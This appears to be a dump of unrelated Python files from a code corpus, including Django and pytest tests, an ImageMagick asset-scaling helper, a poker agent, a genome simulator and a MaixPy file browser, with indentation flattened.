self.query = params.get("query")
self.levenshtein = params.get("levenshtein")
self.domain = params.get("domain")
certstream.listen_for_events(self.callback)
def test(self, params={}):
self.query = params.get("query")
self.levenshtein = params.get("levenshtein")
self.domain = params.get("domain")
if self.query and self.domain:
self.logger.error("Can't use both levenshtein and query")
return 0
return {"domain": "komand.com", "score": "0"}
|
143620
|
import filecmp
import os
import pathlib
from typing import Optional
from approvaltests.core.namer import Namer
from approvaltests.core.reporter import Reporter
from approvaltests.core.writer import Writer
def exists(path: str) -> bool:
return os.path.isfile(path)
class ReporterNotWorkingException(Exception):
def __init__(self, reporter: Reporter):
super().__init__(f"Reporter {reporter} failed to work!")
class FileApprover(object):
def verify(
self,
namer: Namer,
writer: Writer,
reporter: Reporter,
) -> Optional[str]:
base = namer.get_basename()
approved = namer.get_approved_filename(base)
received = namer.get_received_filename(base)
# The writer has the ability to change the name of the received file
received = writer.write_received_file(received)
ok = self.verify_files(approved, received, reporter)
if not ok:
return (
f"Approval Mismatch, received != approved\n"
f"\tApproved: {approved}\n"
f"\tReceived: {received} "
)
return None
def verify_files(
self, approved_file: str, received_file: str, reporter: Reporter
) -> bool:
if self.are_files_the_same(approved_file, received_file):
os.remove(received_file)
return True
worked = reporter.report(received_file, approved_file)
if not worked:
raise ReporterNotWorkingException(reporter)
return False
@staticmethod
def are_files_the_same(approved_file: str, received_file: str) -> bool:
if not exists(approved_file) or not exists(received_file):
return False
if filecmp.cmp(approved_file, received_file):
return True
try:
approved_raw = pathlib.Path(approved_file).read_text()
approved_text = approved_raw.replace("\r\n", "\n")
received_raw = pathlib.Path(received_file).read_text()
received_text = received_raw.replace("\r\n", "\n")
return approved_text == received_text
except:
return False
|
143626
|
from typing import Dict, Any
import json
from e2e.Classes.Transactions.Transactions import Transactions
from e2e.Meros.RPC import RPC
from e2e.Meros.Liver import Liver
from e2e.Meros.Syncer import Syncer
def MultiInputClaimTest(
rpc: RPC
) -> None:
with open("e2e/Vectors/Transactions/MultiInputClaim.json", "r") as file:
vectors: Dict[str, Any] = json.loads(file.read())
transactions: Transactions = Transactions.fromJSON(vectors["transactions"])
Liver(rpc, vectors["blockchain"], transactions).live()
Syncer(rpc, vectors["blockchain"], transactions).sync()
|
143642
|
import pytest
from django.core.exceptions import FieldDoesNotExist
from heroku_connect.models import TRIGGER_LOG_STATE, TriggerLog, TriggerLogArchive
from tests.conftest import make_trigger_log, make_trigger_log_for_model
@pytest.mark.django_db
class TestTriggerLog:
def test_is_archived(self, archived_trigger_log, trigger_log):
assert archived_trigger_log.is_archived is True
assert trigger_log.is_archived is False
def test_get_model(self, trigger_log, connected_model):
assert trigger_log.get_model() == connected_model
connected_model.delete()
assert trigger_log.get_model() is None
def test_related(self, connected_class, connected_model, trigger_log):
related_trigger_log = make_trigger_log_for_model(connected_model)
unrelated_trigger_log = make_trigger_log_for_model(
connected_class.objects.create()
)
trigger_log.save()
related_trigger_log.save()
unrelated_trigger_log.save()
assert set(trigger_log.related()) == {trigger_log, related_trigger_log}
assert set(trigger_log.related(exclude_self=True)) == {related_trigger_log}
assert set(unrelated_trigger_log.related()) == {unrelated_trigger_log}
assert set(unrelated_trigger_log.related(exclude_self=True)) == set()
def test_capture_update_ok(self, trigger_log, hc_capture_stored_procedures):
trigger_log.save()
TriggerLog.objects.get()
trigger_log.capture_update()
assert TriggerLog.objects.count() == 2
def test_capture_update_without_record(self, hc_capture_stored_procedures):
failed_log = make_trigger_log(
state=TRIGGER_LOG_STATE["FAILED"],
table_name="number_object__c",
record_id=666,
action="UPDATE",
)
failed_log.save()
with pytest.raises(TriggerLog.DoesNotExist):
failed_log.capture_update()
def test_capture_update_wrong_update_field(
self, trigger_log, hc_capture_stored_procedures
):
with pytest.raises(FieldDoesNotExist):
trigger_log.capture_update(update_fields=("NOT A FIELD",))
def test_capture_insert_ok(self, trigger_log, hc_capture_stored_procedures):
trigger_log.save()
TriggerLog.objects.get()
trigger_log.capture_insert()
assert TriggerLog.objects.count() == 2
def test_capture_insert_without_record(self, hc_capture_stored_procedures):
failed_log = make_trigger_log(
state=TRIGGER_LOG_STATE["FAILED"],
table_name="number_object__c",
record_id=666,
action="INSERT",
)
failed_log.save()
with pytest.raises(TriggerLog.DoesNotExist):
failed_log.capture_insert()
def test_capture_insert_wrong_field(
self, trigger_log, hc_capture_stored_procedures
):
with pytest.raises(FieldDoesNotExist):
trigger_log.capture_insert(exclude_fields=("NOT A FIELD",))
def test_queryset(self, connected_class, trigger_log, archived_trigger_log):
trigger_log.save()
archived_trigger_log.save()
assert list(TriggerLog.objects.all()) == [trigger_log]
assert list(TriggerLogArchive.objects.all()) == [archived_trigger_log]
connected_model = connected_class.objects.create()
failed = make_trigger_log_for_model(
connected_model, state=TRIGGER_LOG_STATE["FAILED"]
)
failed.save()
assert set(TriggerLog.objects.failed()) == {failed}
assert TriggerLog.objects.all().count() == 2
assert set(TriggerLog.objects.all()) == {trigger_log, failed}
assert list(TriggerLogArchive.objects.all()) == [archived_trigger_log]
related = make_trigger_log_for_model(connected_model)
related.save()
assert TriggerLog.objects.related_to(failed).count() == 2
assert set(TriggerLog.objects.related_to(failed)) == {failed, related}
def test_str(self, trigger_log, archived_trigger_log):
assert str(trigger_log)
assert str(archived_trigger_log)
|
143651
|
import random
import sys
import acpc_python_client as acpc
from tools.agent_utils import select_action, get_info_set
from tools.io_util import read_strategy_from_file
class StrategyAgent(acpc.Agent):
"""Agent able to play any game when provided with game definition and correct strategy."""
def __init__(self, strategy_file_path):
super().__init__()
self.strategy = read_strategy_from_file(None, strategy_file_path)
def on_game_start(self, game):
pass
def on_next_turn(self, game, match_state, is_acting_player):
if not is_acting_player:
return
info_set = get_info_set(game, match_state)
node_strategy = self.strategy[info_set]
selected_action = select_action(node_strategy)
self.set_next_action(selected_action)
def on_game_finished(self, game, match_state):
pass
if __name__ == "__main__":
if len(sys.argv) < 5:
print("Usage {game_file_path} {strategy_file_path} {dealer_hostname} {dealer_port}")
sys.exit(1)
client = acpc.Client(sys.argv[1], sys.argv[3], sys.argv[4])
client.play(StrategyAgent(sys.argv[2]))
|
143668
|
from django.db import models
from django.utils.timezone import now
from django.utils.translation import ugettext_lazy as _
from admin_sso import settings
class OpenIDUser(models.Model):
claimed_id = models.TextField(max_length=2047)
email = models.EmailField()
fullname = models.CharField(max_length=255)
user = models.ForeignKey(settings.AUTH_USER_MODEL)
last_login = models.DateTimeField(_('last login'), default=now)
class Meta:
verbose_name = _('OpenIDUser')
verbose_name_plural = _('OpenIDUsers')
app_label = 'admin_sso'
def __unicode__(self):
return self.claimed_id
def update_last_login(self):
self.last_login = now()
self.save()
class Nonce(models.Model):
server_url = models.CharField(max_length=2047)
timestamp = models.IntegerField()
salt = models.CharField(max_length=40)
class Meta:
app_label = 'admin_sso'
class Association(models.Model):
server_url = models.CharField(max_length=2047)
handle = models.CharField(max_length=255)
secret = models.CharField(max_length=255)
issued = models.IntegerField()
lifetime = models.IntegerField()
assoc_type = models.CharField(max_length=64)
class Meta:
app_label = 'admin_sso'
|
143807
|
from ramda import *
from ramda.private.asserts import *
def to_pairs_test():
assert_equal(to_pairs({"a": 1, "b": 2, "c": 3}), [["a", 1], ["b", 2], ["c", 3]])
|
143860
|
class Publisher:
def __init__(self):
self.observers = []
def add(self, observer):
if observer not in self.observers:
self.observers.append(observer)
else:
print('Failed to add: {}'.format(observer))
def remove(self, observer):
try:
self.observers.remove(observer)
except ValueError:
print('Failed to remove: {}'.format(observer))
def notify(self):
[o.notify(self) for o in self.observers]
class DefaultFormatter(Publisher):
def __init__(self, name):
Publisher.__init__(self)
self.name = name
self._data = 0
def __str__(self):
return "{}: '{}' has data = {}".format(type(self).__name__, self.name, self._data)
@property
def data(self):
return self._data
@data.setter
def data(self, new_value):
try:
self._data = int(new_value)
except ValueError as e:
print('Error: {}'.format(e))
self.notify()
class HexFormatter:
def notify(self, publisher):
print("{}: '{}' has now hex data = {}".format(type(self).__name__, publisher.name, hex(publisher.data)))
class BinaryFormatter:
def notify(self, publisher):
print("{}: '{}' has now bin data = {}".format(type(self).__name__, publisher.name, bin(publisher.data)))
def main():
df = DefaultFormatter('test1')
print(df)
print()
hf = HexFormatter()
df.add(hf)
df.data = 3
print(df)
print()
bf = BinaryFormatter()
df.add(bf)
df.data = 21
print(df)
print()
df.remove(hf)
df.data = 40
print(df)
print()
df.remove(hf)
df.add(bf)
df.data = 'hello'
print(df)
print()
df.data = 15.8
print(df)
if __name__ == '__main__':
main()
|
143863
|
from __future__ import division
import fa
import sys
import os
from fa import chunker
if __name__ == "__main__":
from sys import stderr
import argparse
parser = argparse.ArgumentParser(description=(
"Create a set of synthetic genomes consisting "
"of subgroups per tax level. Some kmers are unique, "
"some are shared, and this provides a case where we can test"
" the efficacy and behavior of our bitmap method."))
parser.add_argument("-n", "--num-nucleotides-per-leaf",
type=int, default=13000)
parser.add_argument("-N", "--num-nucs-shared-per-subgroup",
type=int, default=2000)
parser.add_argument("-l", "--num-nucs-shared-per-level",
type=int, default=8000)
parser.add_argument("-d", "--tree-depth",
type=int, default=4)
parser.add_argument("-s", "--split-size", type=int,
default=3,
help=("Number of subgroups for "
"each parent node."))
parser.add_argument("--parent-map", "-p",
help="Path to which to write synthetic taxonomy.",
default="nodes.dmp")
parser.add_argument("-S", "--subgroup-size", type=int,
default=3,
help="Number of genomes for each subgroup")
parser.add_argument("-o", "--outdir", default=".", type=str)
parser.add_argument("--name-id-map", "-m", default="synth_nameidmap.txt")
args = parser.parse_args()
# Variables/settings for constructing synthetic genome
# and accessory files.
mult_per_layer = args.split_size * args.subgroup_size
depth = args.tree_depth
nleaves = mult_per_layer ** (depth - 1)
leaf_seqs = [fa.SeqId(fa.gen_seq(args.num_nucleotides_per_leaf), i) for
i in range(nleaves)]
nleaf_seq = len(leaf_seqs)
outdir = args.outdir
if not os.path.isdir(outdir):
if os.path.isfile(outdir):
raise Exception("Path set for outdir ('%s') is a"
" file... Nah, dawg." % outdir)
os.mkdir(outdir)
outdir = outdir + '/' # Append slash
name_id_map = outdir + args.name_id_map
parent_map = outdir + args.parent_map
# Variables for constructing the parent_map dictionary.
pcmap = {}
used_seqids = set(i.taxid() for i in leaf_seqs)
ctax = max(used_seqids) + 1
last_layer = []
for i in range(1, depth):
nchunks = nleaf_seq // (mult_per_layer ** i)
chunk_size = nleaf_seq // nchunks
assert nleaf_seq % chunk_size == 0
for seqsetid, seqset in enumerate(chunker(leaf_seqs, chunk_size)):
print("seqset len: %i" % len(seqset), file=stderr)
add = fa.gen_seq(args.num_nucs_shared_per_level)
for seq in seqset:
seq.seq += add
seq.subsets[i] = seqsetid
for sssid, seqsubset in enumerate(chunker(seqset,
args.subgroup_size)):
# print("seqsubset len: %i" % len(seqsubset), file=stderr)
add = fa.gen_seq(args.num_nucs_shared_per_subgroup)
                for seq in seqsubset:
                    seq.seq += add
                    seq.subgroups[i] = sssid
            if i == 1:  # or if not last_layer
# Add leaf node to parent connections
for seq in seqset:
pcmap[seq.taxid()] = ctax + seqsetid
if i > 1:
# Add higher nodes to parent connections
if i == depth - 1:
pcmap.update((el, 1) for el in last_layer)
break
# This leaves the loop on the last layer in the tree
# because the root is 1 by construction
else:
# pcmap.update((tax, i + ctax) for tax in
# last_layer[i:i+mult_per_layer] for
# i in range(mult_per_layer))
for i in range(mult_per_layer):
for tax in last_layer[i:i + mult_per_layer]:
pcmap[tax] = i + ctax
last_layer = [ctax + i for i in range(nchunks)]
used_seqids.update(last_layer)
ctax = max(used_seqids) + 1
del used_seqids
del ctax
del last_layer
{seq.write(outdir + seq.filename()) for seq in leaf_seqs}
print("[1/3] Successfully created synthetic genomes.", file=stderr)
filenames = [outdir + seq.filename() for seq in leaf_seqs]
fa.write_nameid_map(name_id_map, filenames)
print("[2/3] Successfully wrote nameidmap to %s." % name_id_map,
file=stderr)
fa.write_parent_map(parent_map, pcmap)
print("[3/3] Successfully wrote child->parent map.", file=stderr)
stderr.write("Genomes: %s\n" % ', '.join(filenames))
stderr.write("Nameidmap: %s\n" % name_id_map)
stderr.write("Taxonomy: %s\n" % parent_map)
|
143877
|
import os, sys
CHOICES = 'ignore', 'fail', 'warn', 'warn_once'
DEFAULT = 'warn_once'
ACTION = None
HELP = """
Specify what to do when a project uses deprecated features:
ignore: do nothing
warn: print warning messages for each feature
warn_once: print a warning message, but only once for each type of feature
fail: throw an exception
"""
DEPRECATED = set()
FLAG = '--deprecated'
V4_FLAG = '--v4'
ENVIRONMENT_VARIABLE = 'BP_DEPRECATED'
V4_HELP = """\
Run BiblioPixel in v4 compatibility mode, to see if it will work with
future releases v4.x
"""
def add_arguments(parser):
parser.add_argument(V4_FLAG, action='store_true', help=V4_HELP)
def allowed():
_compute_action()
return ACTION != 'fail'
def deprecated(msg, *args, **kwds):
_compute_action()
if ACTION == 'ignore':
return
if ACTION == 'warn_once' and msg in DEPRECATED:
return
formatted = msg.format(*args, **kwds)
if ACTION == 'fail':
raise ValueError(formatted)
DEPRECATED.add(msg)
from . import log
log.warning(formatted)
def _compute_action():
global ACTION
if ACTION:
return
if FLAG in sys.argv:
raise ValueError('%s needs an argument (one of %s)' %
(FLAG, ', '.join(CHOICES)))
if V4_FLAG in sys.argv:
ACTION = 'fail'
d = [i for i, v in enumerate(sys.argv) if v.startswith(FLAG + '=')]
if len(d) > 1:
raise ValueError('Only one %s argument can be used' % FLAG)
if not d:
ACTION = os.getenv(ENVIRONMENT_VARIABLE, ACTION or DEFAULT)
else:
arg = sys.argv.pop(d[0])
_, *rest = arg.split('=')
if len(rest) > 1:
raise ValueError('Extra = in flag %s' % arg)
if not (rest and rest[0].strip()):
raise ValueError('%s needs an argument (one of %s)' %
(FLAG, ', '.join(CHOICES)))
ACTION = rest[0]
if ACTION not in CHOICES:
ACTION = None
raise ValueError('Unknown deprecation value (must be one of %s)' %
', '.join(CHOICES))
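# Illustrative usage sketch (not part of the original module; the feature
# name below is hypothetical):
#
#     from . import deprecated
#
#     def set_brightness(value):
#         deprecated.deprecated('set_brightness is deprecated, use brightness')
#         ...
#
# With the default 'warn_once' action the message is logged a single time per
# unique string; running with `--deprecated=fail`, `--v4`, or
# BP_DEPRECATED=fail makes the call above raise ValueError instead.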
|
143881
|
from nepc import nepc
from nepc.util import util
import pandas as pd
import os
import pytest
import platform
# TODO: remove dependence on csv; put function in scraper that uses built-in
# readlines function
import csv
# TODO: test that all values in [nepc]/tests/data are in the nepc database
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_states_table_has_species_metadata(data_config, nepc_connect):
"""
check that the states table has a species_id column
"""
NEPC_DATA = data_config[0]
number_of_states = util.wc_fxn(NEPC_DATA + 'states.tsv') - 1
df_states = nepc.table_as_df(nepc_connect[1], 'states')
assert len(df_states) == number_of_states
assert 'species_id' in list(df_states.columns)
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_csdata_lines(data_config, nepc_connect):
DIR_NAMES = data_config[1]
cs_lines = 0
for directoryname in DIR_NAMES:
directory = os.fsencode(directoryname)
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename.endswith(".met") or filename.endswith(".mod"):
continue
else:
# subtract 1 to account for header
cs_lines += util.wc_fxn(directoryname + filename) - 1
assert cs_lines == nepc.count_table_rows(nepc_connect[1], "csdata")
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_data_entered(data_config, nepc_connect, local):
NEPC_DATA = data_config[0]
if local is False or platform.node() == 'ppdadamsonlinux':
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_prod.tsv',
delimiter='\t')
else:
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_local.tsv',
delimiter='\t')
for index, row in cs_dat_files.iterrows():
cs_id = row['cs_id']
dat_file = row['filename']
df = pd.read_csv(NEPC_DATA + dat_file + '.dat', delimiter='\t',
usecols=['e_energy', 'sigma'])
e_energy, sigma = nepc.cs_e_sigma(nepc_connect[1], cs_id)
# assert e_energy == pytest.approx(df['e_energy'].tolist())
assert sigma == pytest.approx(df['sigma'].tolist())
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_meta_entered(data_config, nepc_connect, local, dbug):
NEPC_DATA = data_config[0]
if local is False or platform.node() == 'ppdadamsonlinux':
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_prod.tsv',
delimiter='\t')
else:
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_local.tsv',
delimiter='\t')
for index, row in cs_dat_files.iterrows():
cs_id = row['cs_id']
met_file = row['filename']
if dbug:
print(cs_id, met_file)
e, sigma = nepc.cs_e_sigma(nepc_connect[1], cs_id)
meta_cols = ['cs_id', 'process', 'units_e',
'units_sigma', 'ref', 'lhsA',
'lhsB', 'rhsA', 'rhsB', 'threshold', 'wavelength',
'lhs_v', 'rhs_v', 'lhs_j', 'rhs_j',
'background', 'lpu', 'upu']
with open(NEPC_DATA + met_file + ".met", 'r', newline='') as f:
reader = csv.reader(f, delimiter='\t')
next(reader)
meta_disk = list(reader)[0]
meta_disk = [meta_disk[i] for i in list(range(len(meta_cols)))]
for i in [0, 11, 12, 13, 14]:
meta_disk[i] = (int(meta_disk[i]) if meta_disk[i] != '\\N'
else meta_disk[i])
for i in [2, 3, 9, 10, 16, 17]:
meta_disk[i] = (float(meta_disk[i]) if meta_disk[i] != '\\N'
else meta_disk[i])
meta_db = [nepc.cs_metadata(nepc_connect[1], cs_id)[i]
for i in list(range(0, len(meta_cols)))]
if dbug:
print('meta_db: {}\t from {}'.format(meta_db, met_file))
for i in range(len(meta_cols)):
if dbug:
print('meta_db[{}]: {}\t from {}'.format(str(i), str(meta_db[i]), met_file))
if (type(meta_db[i]) is float):
assert (pytest.approx(meta_disk[i]) ==
pytest.approx(meta_db[i]))
elif meta_db[i] is None:
assert meta_disk[i] == '\\N'
else:
assert meta_disk[i] == meta_db[i]
|
143883
|
import subprocess
import math
import os
from pipes import quote
import platform
class Sorolla:
"""
Main class which will launch ImageMagick commands to apply selected
transformations to the given images.
It needs ImageMagick & GhostScript installed in the system and in PATH
to work properly
"""
@staticmethod
def scale_resource(source_file, dest_file, scale):
"""
Scales a resource; detects if it's a nine-patch via filename in order
to scale it properly
Arguments:
source_file Source file to convert. Path can be relative or
absolute
dest_file Destination file where the converted file will be
saved. Path can be relative or absolute
            scale        Scale value as a float. If it's greater than one, the
                         function upscales the image; if less than one,
                         it downscales the image
Returns:
Whether the action could be run or not
"""
        if not Sorolla._check_needed_commands():
return False
# Default base density in dpi, set by Imagemagick
base_pdf_density_dpi = 72
try:
command = ""
if ".9." not in source_file:
# Not a resource identified as nine-patch
density = int(scale * base_pdf_density_dpi)
# Scales a vector resource to the desired density
command = 'convert -background transparent -density {0} {1} {2}'
command = command.format(
density,
Sorolla._shellquote(source_file),
Sorolla._shellquote(dest_file),
)
else:
# Resource defined as nine-patch
# Attributes used in Imagemagick command
imagemagick_scale = scale * 100
border_size = math.ceil(scale)
# The following ImageMagick command works as follows (each step
# generates a temporary image)
#
# 0. Tell convert the image that we're going to use, and that
# we want a transparent background
# 1. Create a copy of (0) with our base density (72 DPI)
# 2. Remove 9-patch border from (1) and replace it with
# color
# 3. Mix (1) & (2) so that 9-patch borders are extracted from
# the transparent original image
# 4. Resize (3) to 'imagemagick_scale'. We get scaled 9-patch
# borders, but there will be semi-transparent pixels
# 5. Apply a threshold in (4)'s alpha channel so we can make
# semi-transparent pixels fully opaque
# 6-7. Same process as in 2-3 to extract a bigger 9-patch
# border
# 8-12. Process to adjust the 9-patch border in (7) so we don't
# leave extra space between the border & the image
# 13. Create a raster of the original image (0), keeping
# original quality if PDF or SVG
# 14. Remove 9-patch border of (13) depending on the scale used
# 15. Merge (14) with (12) so we finally have the result
# 9-patch for the given dpi scale
# 16. Delete all generated files in each step
#
# There might be some pixel data loss in ldpi & hdpi
# resolutions as they use float scales to resize the source
# files
#
# In order to debug the process, copy the command to your
# console, remove the 'delete' parenthesis block and add
# '-append' before the destination file. This'll generate a
# .png with all the image steps described by the commands
command = 'convert {0} -background transparent '\
'\( +clone -density {1} \) '\
'\( +clone -shave 1x1 -bordercolor transparent -border 1x1 \) '\
'\( -clone 1 +clone -compose ChangeMask -composite -compose Over \) '\
'\( +clone -resize {2}%% \) '\
'\( +clone -channel A -threshold 50%% +channel \) '\
'\( +clone -shave 1x1 -bordercolor transparent -border 1x1 \) ' \
'\( -clone 5 +clone -compose ChangeMask -composite -compose Over \) '\
'\( -clone 7 -repage +{3}+0 -background none -flatten \) '\
'\( -clone 7 -repage +0+{3} -background none -flatten \) '\
'\( -clone 7 -repage -{3}+0 -background none -flatten \) '\
'\( -clone 7 -repage +0-{3} -background none -flatten \) '\
'\( -clone 8 -clone 9 -compose Over -composite -clone 10 -composite -clone 11 -composite -shave {3}x{3} \) '\
'\( -clone 0 -scale {2}% \) '\
'\( +clone -shave {4}x{4} -bordercolor transparent -border 1x1 \) '\
'\( +clone -clone 12 -composite \) '\
'\( -delete 0-14 \) '\
'{5}'.format(
Sorolla._shellquote(
os.path.abspath(source_file)),
base_pdf_density_dpi,
imagemagick_scale,
border_size - 1,
border_size,
Sorolla._shellquote(os.path.abspath(dest_file))
)
return Sorolla._run_command(command)
except Exception as e:
            print e
return False
@staticmethod
def color_resource(source_file, dest_file, fill_color):
"""
Colors a raster resource; detects if it's a nine-patch via filename in
order to scale it properly
Arguments:
source_file Source file to color. Path can be relative or
absolute
dest_file Destination file where the colored file will be
saved. Path can be relative or absolute
fill_color Color to fill the resource. Must be a RRGGBB string.
Returns:
Whether the action could be run or not
"""
        if not Sorolla._check_needed_commands():
return False
try:
command = ""
if ".9." not in source_file:
# Not a resource identified as nine-patch
command = 'convert -background transparent {0} +level-colors "#{1}", '\
'{2}'.format(
Sorolla._shellquote(
os.path.abspath(source_file)),
fill_color,
Sorolla._shellquote(os.path.abspath(dest_file)),
)
else:
# nine-patch
command = 'convert -background transparent {0} '\
'\( +clone -shave 1x1 -bordercolor transparent -border 1x1 +level-colors "#{1}", \) '\
'\( -clone 0 +clone -composite \) '\
'\( -delete 0-1 \) '\
'{2}'.format(
Sorolla._shellquote(
os.path.abspath(source_file)),
fill_color,
Sorolla._shellquote(os.path.abspath(dest_file))
)
return Sorolla._run_command(command)
except Exception as e:
            print e
return False
@staticmethod
def tint_resource(source_file, dest_file, tint_color):
"""
Tints a gray-scaled raster resource; detects if it's a nine-patch via
filename in order to tint it properly
Arguments:
source_file Source file to tint. Path can be relative or
absolute
dest_file Destination file where the tinted file will be
saved. Path can be relative or absolute
            tint_color   Color to tint the resource. Must be a RRGGBB string.
Returns:
Whether the action could be run or not
"""
        if not Sorolla._check_needed_commands():
return False
try:
command = ""
if ".9." not in source_file:
# Not a resource identified as nine-patch
# Check http://www.imagemagick.org/Usage/color_mods/#tint_overlay
command = 'convert -background transparent {0} '\
'\( +clone +matte -fill "#{1}" -colorize 100%% +clone +swap -compose overlay -composite \) '\
'-compose SrcIn -composite {2}'.format(
Sorolla._shellquote(
os.path.abspath(source_file)),
tint_color,
Sorolla._shellquote(os.path.abspath(dest_file))
)
else:
# nine-patch
command = 'convert -background transparent {0} '\
'\( +clone -shave 1x1 -bordercolor transparent -border 1x1 \) '\
'\( +clone +matte -fill "#{1}" -colorize 100%% \) '\
'\( -clone 0 +clone -compose overlay -composite \) '\
'\( -clone 0 +clone -compose SrcIn -composite \) '\
'\( -delete 0-3 \) {2}'.format(
Sorolla._shellquote(
os.path.abspath(source_file)),
tint_color,
Sorolla._shellquote(os.path.abspath(dest_file))
)
return Sorolla._run_command(command)
except Exception as e:
            print e
return False
@staticmethod
def _run_command(command):
"""
Runs a given ImageMagick command
"""
# Windows check; remove escape sequences from parentheses so cmd can
# properly launch the command
if Sorolla._is_windows():
command = command.replace('\\(', '(').replace('\\)', ')')
return subprocess.call(command, shell=True) == 0
@staticmethod
def _shellquote(s):
"""
Util method to escape data in order to use it in shell commands
"""
# return "'" + s.replace("'", "'\\''") + "'"
# Windows check
if not Sorolla._is_windows():
return quote(s)
else:
return '"{0}"'.format(s)
@staticmethod
def _check_command(command, args=[]):
"""
Checks if a command can be executed in the file-system
"""
devnull = open(os.devnull, 'w')
try:
status = subprocess.call(
[command] + args, stdout=devnull, stderr=devnull)
return status == 0
except Exception as e:
print e
return False
@staticmethod
def _check_needed_commands():
"""
Check needed commands: ImageMagick's convert & GhostScript
"""
# Imagemagick check
if not Sorolla._check_command("convert"):
print "Imagemagick is not installed"
return False
# Ghostscript check
if not Sorolla._check_command("gs", ["-version"]):
print "GhostScript is not installed"
return False
return True
@staticmethod
def _is_windows():
"""
Check if the current platform is Windows
"""
return platform.uname()[0].find("Win") != -1
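# Illustrative usage sketch (not part of the original module; the module name
# and file names below are hypothetical):
#
#     from sorolla import Sorolla
#
#     # Rasterize a vector asset at twice the base density
#     Sorolla.scale_resource('icon.pdf', 'icon_xhdpi.png', 2.0)
#
#     # Fill a template asset (nine-patch detected via the ".9." infix)
#     Sorolla.color_resource('button.9.png', 'button_red.9.png', 'FF0000')
#
#     # Tint a gray-scaled asset
#     Sorolla.tint_resource('panel.png', 'panel_blue.png', '3366CC')
#
# Each call returns True only if the ImageMagick command exited successfully.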
|
143889
|
import os
import time
import lcd
from Maix import GPIO
from board import board_info
from fpioa_manager import fm
# import uos
S_IFDIR = 0o040000 # directory
# noinspection PyPep8Naming
def S_IFMT(mode):
"""Return the portion of the file's mode that describes the
file type.
"""
return mode & 0o170000
# noinspection PyPep8Naming
def S_ISDIR(mode):
"""Return True if mode is from a directory."""
return S_IFMT(mode) == S_IFDIR
def sizeof_fmt(num, suffix='B'):
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Yi', suffix)
class ExplorerApp:
def __init__(self):
self.current_offset = 0
self.current_selected_index = 0
self.__initialized = False
        self.is_dirty = True
def __lazy_init(self):
self.current_dir_files = os.listdir("/sd/")
print(self.current_dir_files)
self.__initialized = True
def on_top_button_changed(self, state):
if state == "pressed":
print("pressed")
self.current_selected_index += 1
if self.current_selected_index >= len(self.current_dir_files):
self.current_selected_index = 0
if self.current_selected_index >= 7:
self.current_offset = self.current_selected_index - 6
else:
self.current_offset = 0
print("current_selected=", self.current_selected_index,
"current_offset=", self.current_offset)
self.is_dirty = True
def on_draw(self):
self.is_dirty = False
if not self.__initialized:
self.__lazy_init()
x_offset = 4
y_offset = 6
lcd.clear()
for i in range(self.current_offset, len(self.current_dir_files)):
# gc.collect()
file_name = self.current_dir_files[i]
print(file_name)
try:
f_stat = os.stat('/sd/' + file_name)
if S_ISDIR(f_stat[0]):
file_name = file_name + '/'
# gc.collect()
file_readable_size = sizeof_fmt(f_stat[6])
lcd.draw_string(lcd.width() - 50, y_offset,
file_readable_size, lcd.WHITE, lcd.BLUE)
except Exception as e:
print("-------------------->", e)
is_current = self.current_selected_index == i
line = "%s %d %s" % ("->" if is_current else " ", i, file_name)
lcd.draw_string(x_offset, y_offset, line, lcd.WHITE, lcd.RED)
# gc.collect()
y_offset += 18
if y_offset > lcd.height():
print(y_offset, lcd.height(), "y_offset > height(), break")
break
lcd.init()
lcd.rotation(2) # Rotate the lcd 180deg
def test_irq(gpio, pin_num=None):
value = gpio.value()
state = "released" if value else "pressed"
print("key", gpio, state)
global app, key1, key2
if gpio is key2:
app.on_top_button_changed(state)
fm.register(board_info.BUTTON_A, fm.fpioa.GPIOHS21)
fm.register(board_info.BUTTON_B, fm.fpioa.GPIOHS22)
# fm.register(board_info.BUTTON_A, fm.fpioa.GPIOHS21, force=True)
key1=GPIO(GPIO.GPIOHS21, GPIO.IN, GPIO.PULL_UP)
key2=GPIO(GPIO.GPIOHS22, GPIO.IN, GPIO.PULL_UP)
key1.irq(test_irq, GPIO.IRQ_BOTH, GPIO.WAKEUP_NOT_SUPPORT, 7)
key2.irq(test_irq, GPIO.IRQ_BOTH, GPIO.WAKEUP_NOT_SUPPORT, 7)
app = ExplorerApp()
while True:
if app.is_dirty:
app.on_draw()
time.sleep_ms(1)
else:
time.sleep_ms(100)
|
143901
|
import argparse
import os
import shutil
from datetime import datetime
from glob import glob
import gym
import sinergym
envs_id = [env_spec.id for env_spec in gym.envs.registry.all()
if env_spec.id.startswith('Eplus')]
parser = argparse.ArgumentParser()
parser.add_argument('--environments', '-envs', default=envs_id, nargs='+')
parser.add_argument('--episodes', '-ep', type=int, default=1)
args = parser.parse_args()
results = {}
for env_id in args.environments:
env = gym.make(env_id)
# BEGIN EXECUTION TIME
begin_time = datetime.now()
    for _ in range(args.episodes):
        env.reset()
        done = False
        while not done:
            a = env.action_space.sample()
            obs, reward, done, info = env.step(a)
end_time = datetime.now()
env.close()
# END EXECUTION TIME
execution_time = end_time - begin_time
results[env_id] = execution_time.total_seconds()
# Rename directory with name TEST for future remove
os.rename(env.simulator._env_working_dir_parent, 'Eplus-env-TEST' +
env.simulator._env_working_dir_parent.split('/')[-1])
print('====================================================')
print('TIMES RECORDED IN ENVIRONMENTS WITH ', args.episodes, ' EPISODE(S):')
print('====================================================')
for key, value in results.items():
print('{:<50}: {} SECONDS'.format(key, str(value)))
# Deleting all temporal directories generated during tests
directories = glob('Eplus-env-TEST*/')
for directory in directories:
shutil.rmtree(directory)
# Deleting new random weather files once it has been checked
files = glob('sinergym/data/weather/*Random*.epw')
for file in files:
os.remove(file)
|
143909
|
import os
import markdown
from markdown.extensions import Extension
from mako.lookup import TemplateLookup
from mfr.core import extension
class EscapeHtml(Extension):
def extendMarkdown(self, md, md_globals):
del md.preprocessors['html_block']
del md.inlinePatterns['html']
class MdRenderer(extension.BaseRenderer):
TEMPLATE = TemplateLookup(
directories=[
